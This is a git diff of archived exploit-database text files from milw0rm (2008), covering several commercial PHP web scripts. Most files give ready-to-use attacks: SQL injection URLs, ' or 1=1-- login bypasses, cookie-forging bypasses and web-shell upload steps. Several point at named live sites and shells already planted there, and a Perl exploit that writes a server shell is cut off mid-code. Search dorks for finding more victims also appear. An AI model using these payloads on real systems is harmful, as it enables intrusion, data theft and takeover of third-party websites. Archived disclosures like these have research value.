-
-Demo
-________
-
-http://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user
-
-(),0x3e,version()),3,4,5--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
-|
-| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|_____________________________________________________________________
-
-
- Im IRAQi | Im TrYaGi
-
-# milw0rm.com [2008-11-11]
+|___________________________________________________
+|
+| Business Directory Script ( cid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|-------------------- Hussin X -------------------
+|
+| Author: Hussin X
+|
+| Home : WwW.IQ-ty.CoM
+|
+| email: darkangel_g85[at]Yahoo[DoT]com
+|
+|___________________________________________________
+|
+| script : http://www.pozscripts.com/product_details.php?item_id=6
+|
+| DorK : :)
+|___________________________________________________
+
+Exploit:
+________
+
+
+
+www.[target].com/Script/showcategory.php?cid=-264+union+select+1,concat(user(),0x3e,version()),3,4,5--
+
+
+
+Demo
+________
+
+http://www.singwebs.com/businessdirectoryadmindemo/showcategory.php?cid=-264+union+select+1,concat(user
+
+(),0x3e,version()),3,4,5--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+| All members of the Forum| WwW.IQ-ty.CoM | WwW.TrYaG.CC |
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|_____________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-11-11]
diff --git a/platforms/php/webapps/7101.txt b/platforms/php/webapps/7101.txt
index 1118fceb6..367d3e24c 100755
--- a/platforms/php/webapps/7101.txt
+++ b/platforms/php/webapps/7101.txt
@@ -1,58 +1,58 @@
-[~] AlstraSoft SendIt Pro Remote File Upload
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 12.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] dork: "Powered by AlstraSoft SendIt Pro"
-[~]
-[~] my bug number now: 36
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-you save your shell like this: shell.php.pjpeg
-
-warning: filetype not php.jpeg
-
-like this: filetype: php.pjpeg
-
-after you go site
-
-Recipients' e-mail address: write anything
-
-Select file : select your_shell.php.pjpeg
-
-Your e-mail address: email
-
-Message to send to recipient : write anything
-
-and click to send button after you see link and clik to that link
-
-you go your_shell.php.pjpeg :
-
-localhost/script/send/files/[id]shell.php.pjpeg
-
-example for demo:
-
-http://www.blizsoft.com/send/files/84019shell.php.pjpeg
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-12]
+[~] AlstraSoft SendIt Pro Remote File Upload
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 12.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] dork: "Powered by AlstraSoft SendIt Pro"
+[~]
+[~] my bug number now: 36
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+you save your shell like this: shell.php.pjpeg
+
+warning: filetype not php.jpeg
+
+like this: filetype: php.pjpeg
+
+after you go site
+
+Recipients' e-mail address: write anything
+
+Select file : select your_shell.php.pjpeg
+
+Your e-mail address: email
+
+Message to send to recipient : write anything
+
+and click to send button after you see link and clik to that link
+
+you go your_shell.php.pjpeg :
+
+localhost/script/send/files/[id]shell.php.pjpeg
+
+example for demo:
+
+http://www.blizsoft.com/send/files/84019shell.php.pjpeg
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7102.txt b/platforms/php/webapps/7102.txt
index f7fb796b9..11da559c4 100755
--- a/platforms/php/webapps/7102.txt
+++ b/platforms/php/webapps/7102.txt
@@ -1,46 +1,46 @@
-[~] AlstraSoft Article Manager Pro auth bypass
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 12.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 36
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-localhost/script/admin/admin.php
-
-username: ' or ' 1=1--
-
-password: ZoRLu
-
-
-
-admin login for demo:
-
-http://www.blizsoft.com/article/admin/admin.php
-
-username: ' or ' 1=1--
-
-password: ZoRLu
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-12]
+[~] AlstraSoft Article Manager Pro auth bypass
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 12.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 36
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+localhost/script/admin/admin.php
+
+username: ' or ' 1=1--
+
+password: ZoRLu
+
+
+
+admin login for demo:
+
+http://www.blizsoft.com/article/admin/admin.php
+
+username: ' or ' 1=1--
+
+password: ZoRLu
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7103.txt b/platforms/php/webapps/7103.txt
index b092a2d5c..d5880c857 100755
--- a/platforms/php/webapps/7103.txt
+++ b/platforms/php/webapps/7103.txt
@@ -1,43 +1,43 @@
-[~] AlstraSoft Web Host Directory auth bypass
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 12.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] my bug number now: 36
-[~]
-[~] my target bug number: 100
-[~]
-[~] -----------------------------------------------------------
-
-
-Exploit:
-
-username: ZoRLu
-
-password: ' or ' 1=1--
-
-
-admin login for demo:
-
-http://www.hyperstop.com/demo/webhost/
-
-username: ZoRLu
-
-password: ' or ' 1=1--
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org & darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-12]
+[~] AlstraSoft Web Host Directory auth bypass
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 12.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] my bug number now: 36
+[~]
+[~] my target bug number: 100
+[~]
+[~] -----------------------------------------------------------
+
+
+Exploit:
+
+username: ZoRLu
+
+password: ' or ' 1=1--
+
+
+admin login for demo:
+
+http://www.hyperstop.com/demo/webhost/
+
+username: ZoRLu
+
+password: ' or ' 1=1--
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7105.txt b/platforms/php/webapps/7105.txt
index 3f3f0409c..35ea293ba 100755
--- a/platforms/php/webapps/7105.txt
+++ b/platforms/php/webapps/7105.txt
@@ -1,58 +1,58 @@ -|___________________________________________________ -| -| Quick Poll (code.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -| -| Author: Hussin X -| -| Home : http://www.iq-ty.com/ -| -| email: darkangel_g85@Yahoo.com -| -| -|___________________________________________________ -| -| script :http://discountedscripts.com/product_info.php?products_id=69 -| -|___________________________________________________ - -Exploit: -________ - - -Admin Name : - -www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers-- - - -______________________ - -table_name : column_name - -answers : poll -codes : poll -comments : poll -voted : poll - - -______________________ - - - - - -L!VE DEMO: -_________ - - -http://www.discountedscripts.com/demos/newpoll/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers-- - - - - -# EnD - -Im IRAQi - -# milw0rm.com [2008-11-12] +|___________________________________________________ +| +| Quick Poll (code.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +| +| Author: Hussin X +| +| Home : http://www.iq-ty.com/ +| +| email: darkangel_g85@Yahoo.com +| +| +|___________________________________________________ +| +| script :http://discountedscripts.com/product_info.php?products_id=69 +| +|___________________________________________________ + +Exploit: +________ + + +Admin Name : + +www.[target].com/Script/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers-- + + +______________________ + +table_name : column_name + +answers : poll +codes : poll +comments : poll +voted : poll + + +______________________ + + + + + +L!VE DEMO: +_________ + + +http://www.discountedscripts.com/demos/newpoll/code.php?id=-85+union+select+85,85,concat_ws(char(58),user(),version(),database())+from+answers-- + + + 
+ +# EnD + +Im IRAQi + +# milw0rm.com [2008-11-12] diff --git a/platforms/php/webapps/7106.txt b/platforms/php/webapps/7106.txt index 8eb6a3c44..948b38aed 100755 --- a/platforms/php/webapps/7106.txt +++ b/platforms/php/webapps/7106.txt 
@@ -1,55 +1,55 @@
-==============================================================================
- _ _ _ _ _ _
- / \ | | | | / \ | | | |
- / _ \ | | | | / _ \ | |_| |
- / ___ \ | |___ | |___ / ___ \ | _ |
- IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
-
-
-==============================================================================
- ____ _ _ _ _ ___ _ __
- / ___| | || | | \ | | / _ \ | |/ /
- | | _ | || |_ | \| | | | | | | ' /
- | |_| | |__ _| | |\ | | |_| | | . \
- \____| |_| |_| \_| \___/ |_|\_\
-
-==============================================================================
- Turnkeyforms Local Classifieds Auth Bypass Vulnerability
-==============================================================================
-
- [»] Script: [ Turnkeyforms Local Classifieds ]
- [»] Language: [ PHP ]
- [»] Website: [ http://www.turnkeyforms.com/local-classifieds.html ]
- [»] Type: [ Commercial ]
- [»] Report-Date: [ 12.11.2008 ]
- [»] Founder: [ G4N0K ]
-
-
-===[ DTLZ ]===
-
- [!] here we go...
- [»] http://localhost/[paht]/classifieds/Site_Admin/admin.php
-
-
-
-===[ LIVE ]===
-
- [»] http://demo.turnkeyforms.com/localclassifieds/classifieds/Site_Admin/admin.php
- [»] http://petoskeyads.com/classifieds/Site_Admin/admin.php
- [»] http://havasufreeads.com/classifieds/Site_Admin/admin.php
-
-
-===[ Greetz ]===
-
- [»] ALLAH
- [»] Tornado2800
- [»] Hussain-X
-
- //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
- //ALLAH,forgimme...
-
-===============================================================================
-exit();
-===============================================================================
-
-# milw0rm.com [2008-11-12]
+==============================================================================
+ _ _ _ _ _ _
+ / \ | | | | / \ | | | |
+ / _ \ | | | | / _ \ | |_| |
+ / ___ \ | |___ | |___ / ___ \ | _ |
+ IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|
+
+
+==============================================================================
+ ____ _ _ _ _ ___ _ __
+ / ___| | || | | \ | | / _ \ | |/ /
+ | | _ | || |_ | \| | | | | | | ' /
+ | |_| | |__ _| | |\ | | |_| | | . \
+ \____| |_| |_| \_| \___/ |_|\_\
+
+==============================================================================
+ Turnkeyforms Local Classifieds Auth Bypass Vulnerability
+==============================================================================
+
+ [»] Script: [ Turnkeyforms Local Classifieds ]
+ [»] Language: [ PHP ]
+ [»] Website: [ http://www.turnkeyforms.com/local-classifieds.html ]
+ [»] Type: [ Commercial ]
+ [»] Report-Date: [ 12.11.2008 ]
+ [»] Founder: [ G4N0K ]
+
+
+===[ DTLZ ]===
+
+ [!] here we go...
+ [»] http://localhost/[paht]/classifieds/Site_Admin/admin.php
+
+
+
+===[ LIVE ]===
+
+ [»] http://demo.turnkeyforms.com/localclassifieds/classifieds/Site_Admin/admin.php
+ [»] http://petoskeyads.com/classifieds/Site_Admin/admin.php
+ [»] http://havasufreeads.com/classifieds/Site_Admin/admin.php
+
+
+===[ Greetz ]===
+
+ [»] ALLAH
+ [»] Tornado2800
+ [»] Hussain-X
+
+ //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+ //ALLAH,forgimme...
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7107.txt b/platforms/php/webapps/7107.txt
index d268438f0..89378a95f 100755
--- a/platforms/php/webapps/7107.txt
+++ b/platforms/php/webapps/7107.txt
@@ -1,99 +1,99 @@ -============================================================================== - _ _ _ _ _ _ - / \ | | | | / \ | | | | - / _ \ | | | | / _ \ | |_| | - / ___ \ | |___ | |___ / ___ \ | _ | - IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| - - -============================================================================== - ____ _ _ _ _ ___ _ __ - / ___| | || | | \ | | / _ \ | |/ / - | | _ | || |_ | \| | | | | | | ' / - | |_| | |__ _| | |\ | | |_| | | . \ - \____| |_| |_| \_| \___/ |_|\_\ - -============================================================================== - Turnkeyforms Web Hosting Directory Multiple Vulnerabilities -============================================================================== - - [»] Script: [ Turnkeyforms Web Hosting Directory ] - [»] Language: [ PHP ] - [»] Website: [ http://www.turnkeyforms.com/web-hosting-directory.html ] - [»] Type: [ Commercial ] - [»] Report-Date: [ 12.11.2008 ] - [»] Founder: [ G4N0K ] - - -===[ DTLZ ]=== - - [0] Insecure Cookie Handling - - # if ($_COOKIE['adm'] == 1) - # { - # if ($request[1] == 'logout') - # { - # setcookie ("adm", "0"); - # java_redirect($config['base_url']."admin/?".time()); - # } - # $t->assign('logged', 1); - # } - # else { - # if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword']) - # { - # setcookie ("adm", "1"); - # java_redirect($config['base_url']."admin/?".time()); - # } - # $t->assign('logged', 0); - # } - - [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ - [»] javascript:document.cookie = "adm=1"; - - [!] users Auth bypass - [»] javascript:document.cookie = "logged=[username]"; - javascript:document.cookie = "logged=g4n0k"; - - - - [1] Arbitrary Database Backup - - [!] we can download a Backup of Database. 
- [»] http://localhost/[paht]/admin/backup/db - - - - [2] SQLi Auth Bypass - - [»] Username : [a_valid_username] - [»] Password : ' OR '1=1-- - - -===[ LIVE ]=== - - [»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/ - [»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db - - [»] http://tophostingdirectory.com - username: ideas - password: ' OR '1=1-- - - javascript:document.cookie = "logged=ideas"; - - - - -===[ Greetz ]=== - - [»] ALLAH - [»] Tornado2800 - [»] Hussain-X - - //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) - //ALLAH,forgimme... - -=============================================================================== -exit(); -=============================================================================== - -# milw0rm.com [2008-11-12] +============================================================================== + _ _ _ _ _ _ + / \ | | | | / \ | | | | + / _ \ | | | | / _ \ | |_| | + / ___ \ | |___ | |___ / ___ \ | _ | + IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_| + + +============================================================================== + ____ _ _ _ _ ___ _ __ + / ___| | || | | \ | | / _ \ | |/ / + | | _ | || |_ | \| | | | | | | ' / + | |_| | |__ _| | |\ | | |_| | | . 
\ + \____| |_| |_| \_| \___/ |_|\_\ + +============================================================================== + Turnkeyforms Web Hosting Directory Multiple Vulnerabilities +============================================================================== + + [»] Script: [ Turnkeyforms Web Hosting Directory ] + [»] Language: [ PHP ] + [»] Website: [ http://www.turnkeyforms.com/web-hosting-directory.html ] + [»] Type: [ Commercial ] + [»] Report-Date: [ 12.11.2008 ] + [»] Founder: [ G4N0K ] + + +===[ DTLZ ]=== + + [0] Insecure Cookie Handling + + # if ($_COOKIE['adm'] == 1) + # { + # if ($request[1] == 'logout') + # { + # setcookie ("adm", "0"); + # java_redirect($config['base_url']."admin/?".time()); + # } + # $t->assign('logged', 1); + # } + # else { + # if ($request[1] == 'login' && $vars['passwd'] == $config['WebInterfacePassword']) + # { + # setcookie ("adm", "1"); + # java_redirect($config['base_url']."admin/?".time()); + # } + # $t->assign('logged', 0); + # } + + [!] admin Auth bypass, panel => http://localhost/[paht]/admin/ + [»] javascript:document.cookie = "adm=1"; + + [!] users Auth bypass + [»] javascript:document.cookie = "logged=[username]"; + javascript:document.cookie = "logged=g4n0k"; + + + + [1] Arbitrary Database Backup + + [!] we can download a Backup of Database. + [»] http://localhost/[paht]/admin/backup/db + + + + [2] SQLi Auth Bypass + + [»] Username : [a_valid_username] + [»] Password : ' OR '1=1-- + + +===[ LIVE ]=== + + [»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/ + [»] http://www.webhosting-directory.demo.turnkeyforms.com/admin/backup/db + + [»] http://tophostingdirectory.com + username: ideas + password: ' OR '1=1-- + + javascript:document.cookie = "logged=ideas"; + + + + +===[ Greetz ]=== + + [»] ALLAH + [»] Tornado2800 + [»] Hussain-X + + //Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-) + //ALLAH,forgimme... 
+
+===============================================================================
+exit();
+===============================================================================
+
+# milw0rm.com [2008-11-12]
diff --git a/platforms/php/webapps/7110.txt b/platforms/php/webapps/7110.txt
index 05c994f67..a9496d388 100755
--- a/platforms/php/webapps/7110.txt
+++ b/platforms/php/webapps/7110.txt
@@ -1,65 +1,65 @@ -[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 13.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 39 -[~] -[~] my target bug number: 100 -[~] -[~] ----------------------------------------------------------- - - -Exploit: - -http://localhost/script/re_images/[id]_logo_your_shell.php - -you register to site - -register: http://localhost/script/register.php - -after you login to site - -login: http://localhost/script/login.php - -more after you go profile edit - -profile: http://localhost/script/profile.php - -and you upload your_shell.php right click to your logo and select properties copy link - -paste your explorer go your_shell.php - -your_shell.php path: - -http://localhost/script/re_images/[id]_logo_your_shell.php - - - -rfu for demo: - -user: zorlu - -passwd: zorlu1 - -shell path: - -http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-13] +[~] ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 13.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 39 +[~] +[~] my target bug number: 100 +[~] +[~] ----------------------------------------------------------- + + +Exploit: + +http://localhost/script/re_images/[id]_logo_your_shell.php + 
+you register to site + +register: http://localhost/script/register.php + +after you login to site + +login: http://localhost/script/login.php + +more after you go profile edit + +profile: http://localhost/script/profile.php + +and you upload your_shell.php right click to your logo and select properties copy link + +paste your explorer go your_shell.php + +your_shell.php path: + +http://localhost/script/re_images/[id]_logo_your_shell.php + + + +rfu for demo: + +user: zorlu + +passwd: zorlu1 + +shell path: + +http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-13] diff --git a/platforms/php/webapps/7111.txt b/platforms/php/webapps/7111.txt index cd99ad541..d1533cfed 100755 --- a/platforms/php/webapps/7111.txt +++ b/platforms/php/webapps/7111.txt 
@@ -1,65 +1,65 @@ -[~] ScriptsFeed (SF) Auto Classifieds Software Remote File Upload -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 13.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 39 -[~] -[~] my target bug number: 100 -[~] -[~] ----------------------------------------------------------- - - -Exploit: - -http://localhost/script/cars_images/[id]_logo_your_shell.php - -you register to site - -register: http://localhost/script/register.php - -after you login to site - -login: http://localhost/script/login.php - -more after you go profile edit - -profile: http://localhost/script/profile.php - -and you upload your_shell.php right click to your logo and select properties copy link - -paste your explorer go your_shell.php - -your_shell.php path: - -http://localhost/script/cars_images/[id]_logo_your_shell.php - - - -rfu for demo: - -user: zorlu - -passwd: zorlu1 - -shell path: - -http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-13] +[~] ScriptsFeed (SF) Auto Classifieds Software Remote File Upload +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 13.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 39 +[~] +[~] my target bug number: 100 +[~] +[~] ----------------------------------------------------------- + + +Exploit: + +http://localhost/script/cars_images/[id]_logo_your_shell.php + 
+you register to site + +register: http://localhost/script/register.php + +after you login to site + +login: http://localhost/script/login.php + +more after you go profile edit + +profile: http://localhost/script/profile.php + +and you upload your_shell.php right click to your logo and select properties copy link + +paste your explorer go your_shell.php + +your_shell.php path: + +http://localhost/script/cars_images/[id]_logo_your_shell.php + + + +rfu for demo: + +user: zorlu + +passwd: zorlu1 + +shell path: + +http://www.scriptsfeed.com/demos/auto_classifieds_1/cars_images/1226597431_logo_c.php + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke & all Muslim HaCkeRs +[~] +[~] yildirimordulari.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-11-13] diff --git a/platforms/php/webapps/7112.txt b/platforms/php/webapps/7112.txt index 8dd8b69b7..28eea9d48 100755 --- a/platforms/php/webapps/7112.txt +++ b/platforms/php/webapps/7112.txt 
@@ -1,83 +1,83 @@ -[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 13.11.2008 -[~] -[~] Home: www.z0rlu.blogspot.com -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] my bug number now: 39 -[~] -[~] my target bug number: 100 -[~] -[~] dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) ) -[~] -[~] ----------------------------------------------------------- - - -Exploit: - -http://localhost/script/pictures/[id]your_shell.php - -you register to site - -register: http://localhost/script/register.php - -after you login to site - -login: http://localhost/script/login.php - -more after you click to "Add a Recipe" and add recipe - -and after click to "View your Recipes" click to you recipe open new page - -right click to your photo. select properties copy photo lick - -and paste your explorer go your shell - -your_shell.php path: - -http://localhost/script/pictures/[id]your_shell.php - - - -rfu for demo: - -user: zorlu - -passwd: zorlu1 - -shell path: - -http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php - - - -example 2: - -user: zorlu - -passwd: zorlu1 - -shell: - -http://onlineyemektarifi.com/pictures/1226598952c.php? 
( hemen indexlemeyin kurcalayIn serverI ) - -misal: - -http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler ) - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke & all Muslim HaCkeRs -[~] -[~] yildirimordulari.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-11-13] +[~] ScriptsFeed (SF) Recipes Listing Portal Remote File Upload +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 13.11.2008 +[~] +[~] Home: www.z0rlu.blogspot.com +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] my bug number now: 39 +[~] +[~] my target bug number: 100 +[~] +[~] dork: allinurl:"recipedetail.php?id=" ( çok site var sömürün : ) ) +[~] +[~] ----------------------------------------------------------- + + +Exploit: + +http://localhost/script/pictures/[id]your_shell.php + +you register to site + +register: http://localhost/script/register.php + +after you login to site + +login: http://localhost/script/login.php + +more after you click to "Add a Recipe" and add recipe + +and after click to "View your Recipes" click to you recipe open new page + +right click to your photo. select properties copy photo lick + +and paste your explorer go your shell + +your_shell.php path: + +http://localhost/script/pictures/[id]your_shell.php + + + +rfu for demo: + +user: zorlu + +passwd: zorlu1 + +shell path: + +http://www.scriptsfeed.com/demos/recipes_website_1/pictures/1226598339c.php + + + +example 2: + +user: zorlu + +passwd: zorlu1 + +shell: + +http://onlineyemektarifi.com/pictures/1226598952c.php? 
( hemen indexlemeyin kurcalayIn serverI )
+
+misal:
+
+http://onlineyemektarifi.com/pictures/1226598952c.php?act=ls&d=%2Fetc%2Fvdomainaliases ( server daki siteler )
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org & darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7113.txt b/platforms/php/webapps/7113.txt
index c1c2655cb..5bca9a4d2 100755
--- a/platforms/php/webapps/7113.txt
+++ b/platforms/php/webapps/7113.txt
@@ -1,10 +1,10 @@
-###########################################################################
-[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
-[+] Discovered By Mountassif Moad
-[+] www.v4-team.com
-[+] Greetz : All my Freind
-###########################################################################
-Exploit:
-javascript:document.cookie = "login_auth=true; path=/";
-
-# milw0rm.com [2008-11-13]
+###########################################################################
+[+] BandSite CMS 1.1.4 Insecure Cookie Handling Vulnerability
+[+] Discovered By Mountassif Moad
+[+] www.v4-team.com
+[+] Greetz : All my Freind
+###########################################################################
+Exploit:
+javascript:document.cookie = "login_auth=true; path=/";
+
+# milw0rm.com [2008-11-13]
diff --git a/platforms/php/webapps/7114.txt b/platforms/php/webapps/7114.txt
index 6de8ec6c4..48110610e 100755
--- a/platforms/php/webapps/7114.txt
+++ b/platforms/php/webapps/7114.txt
@@ -1,155 +1,155 @@ -#!/usr/bin/perl - -=about - - MemHT 4.0.1 Perl exploit - - AUTHOR - discovered & written by Ams - ax330d [doggy] gmail [dot] com - - VULN. DESCRIPTION: - Due to weak params filtering we are able to make - SQL-Injection. So, - 1. Look at 'inc/ajax/ajax_rating.php', line ~ 29. - It is not enough to check whether script has been accessed from - main file. Better define some value. - 2. 'inc/inc_login.php' line ~ 35. Here we are able to send and - bypass any IP. That eregi does not help, look at exploit in injection, - comma is the last one. - - As proof this exploit creates simple shell. - - REQUIREMENTS: - MySQL should be able to write to file - Know full server path to portal - -=cut - -use strict; -use warnings; -use IO::Socket; - -print " - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - MemHT portal 4.0.1 Perl exploit - ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - "; - -my $expl_url = shift or &usage; -my $serv_path = shift || '-b'; -my $def_shell = '/uploads/file/files.php'; -# Simple concept shell -my $shell = 'new( - Proto => 'tcp', - PeerAddr => $host, - PeerPort => 80 - ); - if( ! $socket) { - return 0; - } else { - - print $socket $packet; - if( $ret ) { - local $/; - 